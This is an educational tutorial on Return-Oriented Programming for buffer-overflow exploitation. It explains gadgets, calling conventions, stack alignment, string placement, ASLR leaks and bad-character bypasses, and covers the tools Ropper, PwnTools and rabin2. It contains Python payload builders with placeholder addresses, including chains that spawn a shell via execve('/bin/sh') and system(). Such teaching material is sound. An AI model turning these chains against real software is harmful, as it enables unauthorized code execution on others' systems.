Return-Oriented Programming (ROP)
Return-Oriented Programming is a common technique for exploiting buffer overflows by chaining together small pieces of existing code, called "gadgets", to do what you want.
The idea of ROP is pretty simple. With a buffer overflow, you can control the Instruction Pointer by overflowing the stack where the return address is stored: on a future return (ret) instruction, the CPU pops that overwritten value from the stack and jumps to it.
The trick is that if we put multiple addresses on the stack, we can keep returning to different tiny pieces of code. Each one executes a few instructions we want, and its own ret keeps the chain going. We can use ROP "gadgets", which are small pieces of code that help achieve greater things, like getting a shell by executing /bin/sh.
The concept is explained in more detail in LiveOverflow's Return-Oriented Programming tutorial.
Common ideas
A few common things that you'll encounter while creating your ROP chain.
Getting values into registers
Since you control the stack, the easiest way to get a value into a register is by popping that value from the stack into that register. If you need 1337 in register $rdi, for example, you could simply find a pop rdi; ret gadget and place the 1337 value right after its address in your payload, so that it gets popped into $rdi.
If you have a simple ROP chain, you can also let PwnTools find this gadget for you with its ROP class.
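Done by hand, the pop rdi; ret payload described above can be sketched with Python's struct module (PwnTools' p64() performs the same little-endian packing). The offset to the saved return address and all addresses below are hypothetical placeholders; the real values depend on your binary.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an unsigned 64-bit integer little-endian, like PwnTools' p64()."""
    return struct.pack("<Q", value)

# Hypothetical values: look up the real ones for your binary.
OFFSET = 40              # bytes from the buffer start to the saved return address
POP_RDI_RET = 0x401234   # address of a "pop rdi; ret" gadget
NEXT_GADGET = 0x401000   # whatever the chain should return into next

payload = b"A" * OFFSET      # fill the buffer up to the saved return address
payload += p64(POP_RDI_RET)  # the vulnerable function's ret jumps here...
payload += p64(1337)         # ...and "pop rdi" takes this value off the stack
payload += p64(NEXT_GADGET)  # the gadget's own ret then continues the chain here
```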
If there aren't simple pop gadgets for the registers you need, you can also get creative with gadgets like add, sub, xor, etc. An xor ecx, ecx; ret gadget, for example, would set ecx to 0. And using the arithmetic instructions, you can change a register from the value it currently holds to the value you want, for example by adding the difference.
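The "add the difference" idea comes down to a little modular arithmetic, because a 64-bit register wraps around. The sketch below assumes you somehow control the operand of an add reg, X or xor reg, X gadget (the helper names are hypothetical) and computes which X turns the current value into the target.

```python
MASK64 = (1 << 64) - 1

def add_operand(current: int, target: int) -> int:
    """Operand for an "add reg, X" gadget that turns current into target.

    Registers wrap around at 64 bits, so the difference is taken modulo 2**64.
    """
    return (target - current) & MASK64

def xor_operand(current: int, target: int) -> int:
    """Operand for an "xor reg, X" gadget that turns current into target."""
    return (current ^ target) & MASK64

# Example: the register currently holds 0x1000 and we want 1337 in it.
delta = add_operand(0x1000, 1337)
assert (0x1000 + delta) & MASK64 == 1337
```

Note that when the target is smaller than the current value, the operand becomes a huge number, which relies on the addition wrapping around.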
rax is the return value
One more useful trick for controlling the rax register specifically is that it contains the return value of the last function call. The read() function, for example, returns the number of bytes it read, and a function that calculates something returns its result there. This can be useful for choosing which syscall to execute, like execve('/bin/sh'), because on x64 the syscall number is also taken from rax.
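As a sketch of that read() trick, suppose (hypothetically) your chain calls read() on a second input right before reaching a syscall gadget, and nothing in between touches rax. Sending exactly 59 bytes would then leave 59, the x64 execve number, in rax. This also assumes read() receives the whole input in a single call; over a network it might return fewer bytes.

```python
EXECVE_X64 = 59  # x64 syscall number for execve()

def sized_input(data: bytes, wanted_rax: int, filler: bytes = b"\x00") -> bytes:
    """Hypothetical helper: pad data so a read() of all of it returns wanted_rax."""
    if len(data) > wanted_rax:
        raise ValueError("data is longer than the return value we need")
    return data + filler * (wanted_rax - len(data))

# The second input can carry the "/bin/sh" string too, as long as its total
# length is exactly the syscall number we want in rax.
second_stage = sized_input(b"/bin/sh\x00", EXECVE_X64)
```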
Getting lucky
The easiest way to get a value into a register is if that value is already in that register when your ROP chain runs. Always set a breakpoint in a debugger where your ROP chain starts and check what the registers contain, to see if you already have some usable values.
Calling functions
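When you call a function from code, a few things happen in assembly. First, the arguments are put where the function expects them. Then the program calls the function, which pushes a return address and jumps to the function's address, and the function reads its arguments from where they were put. Different architectures have different calling conventions: on 32-bit x86 (cdecl) the arguments are pushed onto the stack, while on x64 Linux (System V) the first six integer arguments are passed in rdi, rsi, rdx, rcx, r8 and r9.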
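If these registers are set to the values you want as arguments, you can just jump to the function you wish to call and those will be the arguments. If you wanted to call call_me(1337) on x64, for example, you would need the equivalent of mov rdi, 1337 followed by jmp call_me. In a ROP chain, that becomes the address of a pop rdi; ret gadget, the value 1337, and then the address of call_me.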
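To make the difference between the two calling conventions concrete, here is a sketch of the stack layout for call_me(1337) on both architectures. All addresses are hypothetical. On 32-bit, once ret lands in call_me, the function treats the next stack slot as its return address and the one after it as its first argument, so a placeholder return address has to sit in between.

```python
import struct

# Hypothetical addresses, for illustration only.
CALL_ME_X64 = 0x401196     # address of call_me() in a 64-bit binary
POP_RDI_RET = 0x401234     # "pop rdi; ret" gadget (x64)
CALL_ME_X86 = 0x080491B6   # address of call_me() in a 32-bit binary
FAKE_RET = 0xDEADBEEF      # where call_me() would return to afterwards (32-bit)

# x64 (System V): the argument travels in rdi, so load it before "jumping".
chain_x64 = b"".join(struct.pack("<Q", v) for v in (POP_RDI_RET, 1337, CALL_ME_X64))

# 32-bit x86 (cdecl): the argument lives on the stack, right after the
# return address the function expects at [esp] on entry.
chain_x86 = b"".join(struct.pack("<I", v) for v in (CALL_ME_X86, FAKE_RET, 1337))
```

Replacing FAKE_RET with the address of another function (or a gadget that cleans up the argument) is how 32-bit chains continue after the call.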
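Since we are using a jmp (or a ret) here instead of a clean call, the stack will sometimes end up misaligned on 64-bit. The x64 calling convention expects the stack to be 16-byte aligned at every call, and some library functions (system() is a well-known example) crash on instructions like movaps when it is not. So when your exploit looks like it should work, but it segfaults during some calls or returns inside the target function, try returning to a lone ret instruction first to realign the stack.
In PwnTools you can easily do this by adding the address of a ret gadget to your chain right before your call.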
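The alignment fix can be sketched as follows: an extra ret does nothing except pop the next address, which moves rsp by 8 bytes. The gadget and function addresses are hypothetical, and needs_extra_ret() is an illustrative helper that assumes you know (for example from GDB) the stack address of the slot holding the function's address.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical addresses, for illustration only.
RET = 0x40101A          # a lone "ret" instruction
POP_RDI_RET = 0x401234  # "pop rdi; ret" gadget
SYSTEM = 0x401050       # e.g. system@plt
BINSH = 0x402008        # address of a "/bin/sh" string

def call_system(align: bool) -> bytes:
    chain = p64(POP_RDI_RET) + p64(BINSH)
    if align:
        # The extra ret only pops the next address: rsp moves by 8 bytes,
        # which flips the 16-byte alignment seen by system().
        chain += p64(RET)
    return chain + p64(SYSTEM)

def needs_extra_ret(slot_address: int) -> bool:
    """True if returning into a function from this stack slot misaligns rsp.

    After ret pops the function address, rsp = slot_address + 8. The x64
    System V ABI expects rsp % 16 == 8 on function entry (as if a call had
    just pushed a return address).
    """
    return (slot_address + 8) % 16 != 8
```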
Getting strings into registers
Many functions need strings as arguments, like the system() function or the execve() syscall, which both need "/bin/sh" as the first argument in order to spawn a shell. Strings are not passed by value, but by reference. This means we actually need to provide a pointer to the string as the argument, and the string itself needs to be somewhere in memory. That leaves two problems to solve:
We need to get the string into memory
We need to know its location
There are a few ways to do this, but no one-size-fits-all solution. It all depends on what is available in the binary.
Already stored in memory
If you're lucky, the string might already be stored in the binary. In libc for example, there exists a "/bin/sh" string that is often used for ret2libc. But you might need other strings that can be found in the binary.
Searching for the offsets of such strings is easy using the grep command of GDB GEF while the binary is running.
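Outside the debugger, the same search can be sketched as a plain byte search over a file's contents. The helper name is hypothetical, and keep in mind that an offset inside the file is not always the same as the offset in memory once the file is mapped; GEF's grep, or PwnTools' ELF.search(), report addresses in memory instead.

```python
from typing import List

def find_all(data: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in data."""
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets
```

For example, find_all(open(path, "rb").read(), b"/bin/sh\x00") lists every file offset of a NUL-terminated "/bin/sh", where path points to the library or binary you want to search.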
If your target system has ASLR enabled, some locations like the libc library will be loaded at a random base address. To use a string from there, you first need to leak an address inside the library and then add the string's fixed offset to the base address you calculated.
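The leak-and-offset calculation can be sketched like this, assuming (hypothetically) that you leaked the runtime address of puts(). Both offsets below are made-up placeholders: the real ones depend on the exact libc build on the target and can be read from its symbols and a string search.

```python
# Hypothetical offsets for one specific libc build; look up your own.
PUTS_OFFSET = 0x80E50     # offset of puts() inside the library
BINSH_OFFSET = 0x1D8698   # offset of "/bin/sh" inside the library

def libc_base_from_leak(leaked_puts: int) -> int:
    base = leaked_puts - PUTS_OFFSET
    # Libraries are mapped at page-aligned addresses, so a correct base
    # ends in 0x000; anything else usually means the offsets are wrong.
    if base & 0xFFF:
        raise ValueError("leak does not match this libc: base is not page-aligned")
    return base

leaked = 0x7F3A1C280E50           # example leaked address of puts() for one run
libc_base = libc_base_from_leak(leaked)
binsh = libc_base + BINSH_OFFSET  # address of "/bin/sh" for this run only
```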
But some addresses, like the .data section of a binary that is not compiled as a position-independent executable (PIE), are not randomized, even when ASLR is enabled. So if your desired string is stored in such a section, you can always use it.
From the stack
In a buffer overflow attack, you overflow the stack with your own values to control return addresses, and maybe pop values into registers. But you may also be able to use this space to write your required strings into, and then just provide an address to the stack where your string is stored. This string can then be part of your payload, and so will reference itself.
You can easily get the location of your string on the stack by running the program, sending a payload that contains your desired string, and then using the GDB GEF grep command from above to find where it is stored. This gives you a location on the stack, which you can then reference to get a pointer to any string in your payload.
Note that with ASLR, the stack address is randomized. This means that if ASLR is enabled, you will need to first leak a stack address and then use relative offsets from there to find your payload again.
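A self-referencing payload can be sketched as below. It assumes (hypothetically) that you can leak some stack address and measured in GDB that your buffer always starts 0x120 bytes below it; the gadget and function addresses are placeholders too. The string is placed after the chain, and its pointer is the buffer start plus everything that comes before it.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical values, for illustration only.
LEAK_TO_BUFFER = -0x120  # buffer start relative to the leaked stack address
OFFSET = 40              # bytes from buffer start to the saved return address
POP_RDI_RET = 0x401234   # "pop rdi; ret" gadget
SYSTEM = 0x401050        # e.g. system@plt

def build(leaked_stack: int) -> bytes:
    buffer_start = leaked_stack + LEAK_TO_BUFFER
    head = b"A" * OFFSET + p64(POP_RDI_RET)
    # The string follows the pointer slot and the system() address,
    # so it starts 16 bytes after the end of head.
    string_offset = len(head) + 8 + 8
    chain = head + p64(buffer_start + string_offset) + p64(SYSTEM)
    return chain + b"/bin/sh\x00"
```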
Arbitrary write
Another method is to use an arbitrary write if you have one. Using ROP or a format string exploit, you might be able to write data to memory. You can then build the string you need piece by piece and use the address of that location.
Often you can find some static read/write section where data may be written without corrupting the program. These sections and their addresses can be listed with many tools, such as rabin2 from radare2 (rabin2 -S shows the sections with their addresses).
When searching for ROP gadgets to achieve this, you can use mov instructions that store one register at the address held in another, for example mov qword ptr [rdi], rsi; ret.
If you control both registers, you can write any value to any address, which is called an "arbitrary write". There are many different ways to achieve this and you can be creative with it. Then just write several 8-byte chunks to consecutive addresses to form the full string.
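The chunk-by-chunk write can be sketched as follows, assuming the binary happens to contain a pop rdi; pop rsi; ret gadget and a mov qword ptr [rdi], rsi; ret gadget. Both gadget addresses and the writable target address are hypothetical.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical gadgets and target, for illustration only.
POP_RDI_POP_RSI_RET = 0x401300  # "pop rdi; pop rsi; ret"
MOV_QWORD_RDI_RSI = 0x401310    # "mov qword ptr [rdi], rsi; ret"
WRITABLE = 0x404028             # e.g. start of a writable .data area

def write_string(address: int, data: bytes) -> bytes:
    """ROP chain that writes data (NUL-terminated) to address, 8 bytes per mov."""
    data += b"\x00"                     # make sure the string is NUL-terminated
    data += b"\x00" * (-len(data) % 8)  # pad up to whole 8-byte chunks
    chain = b""
    for i in range(0, len(data), 8):
        chunk = struct.unpack("<Q", data[i:i + 8])[0]
        chain += p64(POP_RDI_POP_RSI_RET) + p64(address + i) + p64(chunk)
        chain += p64(MOV_QWORD_RDI_RSI)  # *(uint64_t *)rdi = rsi
    return chain
```

After such a chain, WRITABLE can be used as the pointer to the string.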
execve('/bin/sh')
execve() is a syscall: a function implemented by the kernel itself. A program must use a special instruction to switch from user mode into kernel mode temporarily and let the kernel perform the operation. There are two ways of doing this:
syscall
This instruction is exclusive to 64-bit and uses the $rax register to decide which syscall to execute. The full list of x64 syscalls with their arguments can be found in a Linux x64 syscall table.
There we can find execve() as number 59, or 0x3B, with the arguments execve(const char *filename, char *const argv[], char *const envp[]).
In assembly, the following values should be set: $rax = 0x3B, $rdi = address of "/bin/sh", $rsi = argv and $rdx = envp.
Often we don't care about arguments, because we can just run /bin/sh without any. Then these extra $rsi and $rdx registers should be set to 0.
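Put together, the register setup above can be sketched as a chain of pop gadgets followed by a syscall instruction. The gadget addresses and the "/bin/sh" address are hypothetical placeholders you would replace with real ones found by a gadget tool.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical addresses, for illustration only.
POP_RAX_RET = 0x401001
POP_RDI_RET = 0x401234
POP_RSI_RET = 0x401236
POP_RDX_RET = 0x401238
SYSCALL = 0x40123A   # a "syscall" instruction; execve does not return on success
BINSH = 0x402008     # address of "/bin/sh\x00" in memory

execve_chain = b"".join(p64(v) for v in (
    POP_RAX_RET, 0x3B,   # rax = 59: execve
    POP_RDI_RET, BINSH,  # rdi = filename
    POP_RSI_RET, 0,      # rsi = argv = NULL
    POP_RDX_RET, 0,      # rdx = envp = NULL
    SYSCALL,
))
```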
int 0x80
On 32-bit x86, the syscall instruction is not available. Instead, a kernel call is made by issuing an interrupt: with interrupt 0x80 (int 0x80) you can invoke a syscall just like we did on 64-bit. In some cases the compiler will still generate an int 0x80 instruction even on 64-bit, so it is always worth looking for regardless of architecture. Keep in mind that int 0x80 always uses the 32-bit syscall numbers and registers, even inside a 64-bit process.
The 32-bit syscall numbers are different and can be found in a Linux 32-bit syscall table.
There we can find execve() as number 11, or 0x0B, and its arguments are the same as for syscall above. In assembly you should set the values like this (note the different registers): $eax = 0x0B, $ebx = address of "/bin/sh", $ecx = argv (0) and $edx = envp (0).
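The 32-bit version of the chain looks much the same, with 4-byte values and the 32-bit registers. The sketch assumes hypothetical pop eax; ret, pop ebx; ret and pop ecx; pop edx; ret gadgets plus an int 0x80 instruction at made-up addresses.

```python
import struct

def p32(value: int) -> bytes:
    return struct.pack("<I", value)

# Hypothetical 32-bit addresses, for illustration only.
POP_EAX_RET = 0x080491A1
POP_EBX_RET = 0x080491A3
POP_ECX_POP_EDX_RET = 0x080491A5  # pops ecx first, then edx
INT_0X80 = 0x080491A8
BINSH = 0x0804C020                # address of "/bin/sh\x00" in memory

execve_chain_32 = b"".join(p32(v) for v in (
    POP_EAX_RET, 0x0B,           # eax = 11: execve on 32-bit
    POP_EBX_RET, BINSH,          # ebx = filename
    POP_ECX_POP_EDX_RET, 0, 0,   # ecx = argv = NULL, edx = envp = NULL
    INT_0X80,
))
```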
SROP
Bypassing badchars
"badchars" is the name for characters that the application does not allow. These may be newlines (\x0A), which could make the application stop reading before your whole payload is in, or null bytes (\x00), which would terminate your string early. In some specific cases the restrictions are stricter, and you might need to pull out tricks to avoid those banned characters.
If you are trying to inject "/bin/sh" in your payload, for example, but the / slash is banned, you can try to do it in more steps.
If you first write ".cho.ri", without any / slash character, you can later XOR every byte with \x01 to get back the original /bin/sh string. This requires an XOR gadget in the binary, or any other similar instruction that allows you to alter the bytes of your payload. Some common ones are:
xor: XOR both operands and store the result in the first
add: add both together and store the result in the first
sub: subtract the second from the first and store the result in the first
These allow you to change the initial string you send in the payload, and then dynamically change it after it is stored in memory on the target.
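The ".cho.ri" trick can be generalized with a small search for a one-byte XOR key that keeps both the encoded string and the key itself free of badchars. This is a sketch with hypothetical helper names; on the target, the decoding still has to be done by your xor gadget (byte by byte, or with the key repeated across all 8 bytes, such as 0x0101010101010101, for a 64-bit xor).

```python
from typing import Optional

def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores data."""
    return bytes(b ^ key for b in data)

def find_key(data: bytes, badchars: bytes) -> Optional[int]:
    """Smallest one-byte key such that neither the encoded data nor the key
    itself contains a badchar (the key has to be sent in the payload too)."""
    for key in range(1, 256):
        encoded = xor_bytes(data, key)
        if key not in badchars and not any(b in badchars for b in encoded):
            return key
    return None
```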
Ropper
Ropper is a colorful CLI tool that can automatically find ROP gadgets (small pieces of code that end in a ret) that will be useful in creating a full chain. It prints all sorts of gadgets, and the idea is that you search its output for what you need, for example xor instructions.
To get more flexible output, you can also just pipe the tool's output through grep with what you are looking for.
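To give an idea of what such tools do at their simplest, here is a naive byte-pattern search for a few x86-64 gadgets. This is a deliberate simplification, not how Ropper or ROPgadget work internally: they disassemble the bytes before every ret, so they also find multi-instruction gadgets and gadgets hidden inside other instructions. The helper name and the input bytes are hypothetical.

```python
from typing import Dict, List

# Raw x86-64 encodings of a few gadgets (0xc3 is ret).
GADGETS = {
    "pop rdi; ret": b"\x5f\xc3",
    "pop rsi; ret": b"\x5e\xc3",
    "pop rax; ret": b"\x58\xc3",
    "syscall; ret": b"\x0f\x05\xc3",
    "ret": b"\xc3",
}

def find_gadgets(code: bytes, base: int) -> Dict[str, List[int]]:
    """Map each gadget name to every address where its bytes appear.

    code is the raw content of an executable section, base its load address.
    """
    found = {}
    for name, pattern in GADGETS.items():
        hits = []
        i = code.find(pattern)
        while i != -1:
            hits.append(base + i)
            i = code.find(pattern, i + 1)
        found[name] = hits
    return found
```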
ropper may find different gadgets than ROPgadget, a similar tool that also finds gadgets but may turn up different ones that are more useful for your chain.
Ropper can even try to build a full chain for you. One example is the execve('/bin/sh', 0, 0) syscall, which can be generated automatically if everything it requires exists (note that the generated code is Python 2).
PwnTools
I highly recommend using as much PwnTools magic as you can. It can significantly simplify your payload, and using print(rop.dump()) you can still see what it is doing when you need to debug. Things like setting registers or calling functions are often tedious, but with PwnTools' ROP class it's a breeze.
rabin2
rabin2 from radare2 is a CLI tool that can analyze a binary for you. It has a lot of different options that give useful information while planning your ROP exploits:
-i: show imports (functions imported from libraries)
-z: show strings in the .data section
-s: show all symbols
-S: show sections (with addresses)